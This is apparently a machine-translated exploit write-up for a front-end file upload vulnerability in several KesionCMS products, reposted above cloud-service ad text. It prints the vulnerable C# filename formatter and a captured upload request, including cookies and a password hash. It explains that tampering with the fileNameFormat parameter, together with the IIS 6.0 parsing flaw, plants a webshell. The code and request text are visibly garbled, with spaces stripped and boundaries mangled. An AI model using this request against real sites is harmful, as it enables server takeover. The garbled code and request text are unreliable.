KesionCMS multi-system front-end Upload Vulnerability
KesionICMS smart site creation system V2.5
KesionEshop online mall system X1.0.141206
KesionIMALL online mall system V2.5
KesionEdu online school training system V2.5
This vulnerability is caused by the UEditor editor used at the front end of the above system. // This vulnerability should be caused by secondary development.
C#publicstaticclassNameFormater { publicstaticstringFormat(stringformat,stringfilename) { if(String.IsNullOrEmpty(format)) { format="{filename}{rand:6}"; } stringext=Path.GetExtension(filename); filename=Path.GetFileNameWithoutExtension(filename); format=format.Replace("{filename}",filename); format=newRegex(@"\{rand(\:?)(\d+)\}",RegexOptions.Compiled).Replace(format,newMatchEvaluator(delegate(Match match) { intdigit=6; if(match.Groups.Count>2) { digit=Convert.ToInt32(match.Groups[2].Value); } Random rand=newRandom(); returnrand.Next((int)Math.Pow(10,digit),(int)Math.Pow(10,digit+1)).ToString(); })); format=format.Replace("{time}",DateTime.Now.Ticks.ToString()); format=format.Replace("{yyyy}",DateTime.Now.Year.ToString()); format=format.Replace("{yy}",(DateTime.Now.Year%100).ToString("D2")); format=format.Replace("{mm}",DateTime.Now.Month.ToString("D2")); format=format.Replace("{dd}",DateTime.Now.Day.ToString("D2")); format=format.Replace("{hh}",DateTime.Now.Hour.ToString("D2")); format=format.Replace("{ii}",DateTime.Now.Minute.ToString("D2")); format=format.Replace("{ss}",DateTime.Now.Second.ToString("D2")); Regex invalidPattern=newRegex(@"[\\\/\:\*\?\042\<\>\|]"); format=invalidPattern.Replace(format,""); returnformat+ext; } }
Packet Capture
XHTMLPOST/plus/ueditor/imageUp. ashx HTTP/1.1 Host: demo.bkwy.org Proxy-Connection: keep-alive Content-Length: 824 Cache-Control: no-cache Origin: http://demo.bkwy.org User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.36 Content-Type: multipart/form-data; boundary = tmbtrfjfrrifuji wmvskngarqwewwieuo Accept: */* Referer: http://demo.bkwy.org /Ueditor/dialogs/image/imageUploader.swf Accept-Encoding: gzip, deflate Accept-Language: zh-CN, zh; q = 0.8 Cookie: admin = AdminID = 76 & AdminUser = admin & AdminPass = login & UserType = 1 & PowerList = & DocPower = 1 & AdminLoginCode =; myShop = userName = iz8ez4tgy5gw; myViewRecord = userName = login; ASP. NET_SessionId = wfkb2dffjuvnzauyqfpacemj; CheckCode = 44T2L; User = userid = 191 & username = test & password = 49ba59abbe56e057 & RndPassword = encrypted -- encrypted Content-Disposition: form-data; name = "fileName" 2.16.gif -- inclucontent-Disposition: form-data; name = "dir"/UploadFiles/2015-3/76 -- tmbtrfjfrrifuji wmvskngarqwewwieuo Content-Disposition: form-data; name = "Filename" 2.16.gif -- Invalid Content-Disposition: form-data; name = "pictitle" 2.16.gif -- tmbtrfjfrrifuji wmvskngarqwewwieuo Content-Disposition: form-data; name = "fileNameFormat" {time} {rand: 6} // the time before the suffix can be changed to anything except asp asa aspx-tmbtrfjfrrifuji wmvskngarqwewwieuo Content-Disposition: form-data; name = "upfile"; filename = "pai.gif" Content-Type: application/octet-stream xxxxxx -- tmbtrfjfrrifuji wmvskngarqwewwieuo Content-Disposition: form-data; name = "Upload" Submit Query -- tmbtrfjfrrifuji wmvskngarqwewwieuo -- POST/plus/ueditor/imageUp. ashxHTTP/1.1 Host: demo.bkwy.org Proxy-Connection: keep-alive Content-Length: 824 Cache-Control: no-cache Origin: http://demo.bkwy.org User-Agent: Mozilla/5.0 (WindowsNT6.3; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/38.0.2125.101Safari/537.36 Content-Type: multipart/form-data; boundary = Accept: */* Referer: http://demo.bkwy.org /Ueditor/dialogs/image/imageUploader.swf Accept-Encoding: gzip, deflate Accept-Language: zh-CN, zh; q = 0.8 Cookie: admin = AdminID = 76 & AdminUser = admin & AdminPass = login & UserType = 1 & PowerList = & DocPower = 1 & AdminLoginCode =; myShop = userName = iz8ez4tgy5gw; myViewRecord = userName = login; ASP. NET_SessionId = wfkb2dffjuvnzauyqfpacemj; CheckCode = 44T2L; User = userid = 191 & username = test & password = 49ba59abbe56e057 & RndPassword = encrypted -- encrypted Content-Disposition: form-data; name = "fileName" 2.16.gif -- inclucontent-Disposition: form-data; name = "dir"/UploadFiles/2015-3/76 -- tmbtrfjfrrifuji wmvskngarqwewwieuo Content-Disposition: form-data; name = "Filename" 2.16.gif -- Invalid Content-Disposition: form-data; name = "pictitle" 2.16.gif -- tmbtrfjfrrifuji wmvskngarqwewwieuo Content-Disposition: form-data; name = "fileNameFormat" {time} {rand: 6} // the time before the suffix can be changed to anything except aspasaaspx-tmbtrfjfrrifuji wmvskngarqwewwieuo Content-Disposition: form-data; name = "upfile"; filename = "pai.gif" Content-Type: application/octet-stream xxxxxx -- tmbtrfjfrrifuji wmvskngarqwewwieuo Content-Disposition: form-data; name = "Upload" SubmitQuery -- tmbtrfjfrrifuji wmvskngarqwewwieuo --
Modify the content in the fileNameFormat parameter and use the iis6.0 Upload Vulnerability to win the webshell.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
